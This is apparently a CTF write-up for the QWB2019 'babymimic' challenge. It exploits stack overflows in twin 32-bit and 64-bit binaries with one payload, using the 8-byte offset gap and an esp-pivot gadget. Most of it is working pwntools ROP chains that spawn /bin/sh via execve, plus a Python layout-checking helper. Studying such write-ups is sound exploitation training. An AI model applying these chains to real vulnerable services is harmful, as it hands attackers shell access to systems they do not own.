QWB2019-babymimic

A PWN "mimic defense" challenge: the same input has to produce identical output on two programs, and the exploit has to break both of them at once. I'll skip the preliminary brute-forcing and so on; EX's blog covers that.

1. The two programs are stkof32 and stkof64. They are almost identical, except that one is 64-bit and the other 32-bit. Each is a textbook stack overflow, but the offsets differ: 272 bytes in the 32-bit build and 280 bytes in the 64-bit build, an 8-byte difference. That difference is the opening that lets a single exploit break both programs. Since neither binary has PIE enabled, we can ROP directly.

2. We work with those 8 bytes of difference: the 32-bit program will execute two more 4-byte stack slots than the 64-bit one, so those two slots are where we do our work.

3. The 64-bit ROP chain is placed directly at the 64-bit return address; the 32-bit program uses the two extra slots to move esp down, and its ROP chain is placed after the 64-bit chain:

(1) 64-bit:

# syscall arguments go in rdi, rsi, rdx
# gadget addresses (pop_rax_ret, ...) come from ROPgadget on the statically linked binary

# read(0, 0x0069e200, 0x200): read "/bin/sh" into writable memory
payload += p64(pop_rax_ret) + p64(0x0)
payload += p64(pop_rdi_ret) + p64(0x0)
payload += p64(pop_rsi_ret) + p64(0x0069e200)
payload += p64(pop_rdx_ret) + p64(0x200)
payload += p64(syscall)

# execve("/bin/sh", 0, 0)
payload += p64(pop_rax_ret) + p64(0x3b)
payload += p64(pop_rdi_ret) + p64(0x0069e200)
payload += p64(pop_rsi_ret) + p64(0x0)
payload += p64(pop_rdx_ret) + p64(0x0)
payload += p64(syscall)

(2) 32-bit:

# syscall arguments go in ebx, ecx, edx

# read(0, 0x080d7200, 0x200): read "/bin/sh" into writable memory
# (the gadget pops edx, ecx, ebx in that order: count, buffer, fd)
payload += p32(pop_edx_ecx_ebx_ret)
payload += p32(0x200)+p32(0x080d7200)+p32(0x0)
payload += p32(pop_eax_ret) + p32(0x3)
payload += p32(int0x80)

# execve("/bin/sh", 0, 0)
payload += p32(pop_edx_ecx_ebx_ret)
payload += p32(0x0)+p32(0x0)+p32(0x080d7200)
payload += p32(pop_eax_ret) + p32(0xb)
payload += p32(int0x80)

(3) Moving esp down:

# offset is 272 (the 32-bit overflow offset); the 32-bit ret lands on 'add esp, 0x100; ret',
# the following 4 bytes are filler, and the 64-bit return address sits right after them
payload = ""
payload += "A"*offset + p32(add_0x100) + p32(0x0)

Putting it all together:

from pwn import *

# gadget addresses (add_0x100, pop_rax_ret, pop_edx_ecx_ebx_ret, int0x80, ...) come from
# ROPgadget on the statically linked binaries

offset = 272   # 32-bit overflow offset; the 64-bit return address sits 8 bytes later (280)

# add esp: the 32-bit program returns into 'add esp, 0x100; ret' (4 bytes) plus 4 bytes of
# filler, which together occupy the 8 bytes before the 64-bit return address
payload = ""
payload += "A"*offset + p32(add_0x100) + p32(0x0)

# 64-bit chain, arguments in rdi, rsi, rdx; built on its own so it can be padded to a fixed size
rop64 = ""
# read(0, 0x0069e200, 0x200): read "/bin/sh" into writable memory
rop64 += p64(pop_rax_ret) + p64(0x0)
rop64 += p64(pop_rdi_ret) + p64(0x0)
rop64 += p64(pop_rsi_ret) + p64(0x0069e200)
rop64 += p64(pop_rdx_ret) + p64(0x200)
rop64 += p64(syscall)
# execve("/bin/sh", 0, 0)
rop64 += p64(pop_rax_ret) + p64(0x3b)
rop64 += p64(pop_rdi_ret) + p64(0x0069e200)
rop64 += p64(pop_rsi_ret) + p64(0x0)
rop64 += p64(pop_rdx_ret) + p64(0x0)
rop64 += p64(syscall)
# pad the 64-bit chain to 0x100-4 bytes so the 32-bit chain begins at offset+4+0x100,
# exactly where esp points when the add esp gadget executes its ret
# (str.ljust returns a new string, so the result must be assigned)
rop64 = rop64.ljust(0x100-4, '\x00')
payload += rop64

# 32-bit chain, arguments in ebx, ecx, edx
# read(0, 0x080d7200, 0x200): read "/bin/sh" into writable memory
payload += p32(pop_edx_ecx_ebx_ret)
payload += p32(0x200)+p32(0x080d7200)+p32(0x0)
payload += p32(pop_eax_ret) + p32(0x3)
payload += p32(int0x80)
# execve("/bin/sh", 0, 0)
payload += p32(pop_edx_ecx_ebx_ret)
payload += p32(0x0)+p32(0x0)+p32(0x080d7200)
payload += p32(pop_eax_ret) + p32(0xb)
payload += p32(int0x80)
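
As a check on the stack layout this trick depends on, here is an added example (Python 3, not part of the original exploit): it models where each program's `ret` lands, derives the 0x100-4 padding from the offsets instead of hard-coding it, and rejects a 64-bit chain that would run into the 32-bit one. The gadget address is a hypothetical placeholder and the chains fed in are constructed dummies.

```python
import struct

OFF32, OFF64 = 272, 280      # overflow offsets given in the writeup (stkof32 / stkof64)
ADD_ESP = 0x100              # effect of the 32-bit 'add esp, 0x100; ret' gadget
ADD_ESP_GADGET = 0x0804AAAA  # placeholder address, hypothetical (not from the binary)


def build_layout(rop64, rop32, off32=OFF32, off64=OFF64, add_esp=ADD_ESP):
    """Assemble the dual-architecture payload and return (payload, positions).

    rop64 / rop32 are the already-packed 64-bit and 32-bit chains (bytes).
    Raises ValueError when the two chains would collide.
    """
    if off64 < off32 + 4:
        raise ValueError("no room for the 32-bit gadget pointer before the 64-bit return address")
    # 32-bit: 'ret' pops the gadget at off32, esp -> off32+4; the gadget adds add_esp,
    # then its own 'ret' pops the first 32-bit gadget from chain32_start.
    chain32_start = off32 + 4 + add_esp
    # 64-bit: 'ret' pops the first 64-bit gadget at off64; the chain may extend only up to
    # chain32_start, i.e. room64 bytes (0x100-4 for the writeup's offsets).
    room64 = chain32_start - off64
    if len(rop64) > room64:
        raise ValueError("64-bit chain (%d bytes) overlaps the 32-bit chain" % len(rop64))
    payload = b"A" * off32
    payload += struct.pack("<I", ADD_ESP_GADGET) + b"\x00" * (off64 - off32 - 4)
    payload += rop64.ljust(room64, b"\x00")
    payload += rop32
    positions = {"ret32_slot": off32, "chain64_start": off64, "chain32_start": chain32_start}
    return payload, positions


def first_return_target(payload, positions, bits):
    """The value each binary pops as its return address when the overflowed function returns."""
    if bits == 32:
        return struct.unpack_from("<I", payload, positions["ret32_slot"])[0]
    return struct.unpack_from("<Q", payload, positions["chain64_start"])[0]


def chain32_first_gadget(payload, positions):
    """The value the 32-bit program pops once 'add esp, 0x100; ret' has executed."""
    return struct.unpack_from("<I", payload, positions["chain32_start"])[0]
```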

The rest is just finding ROP gadgets, which I won't go into. The only reason so many gadgets are available is that the binaries are statically linked, so gadgets are everywhere; with dynamically linked binaries this would take considerably more work.

References:

https://www.dazhuanlan.com/bob24/topics/1295510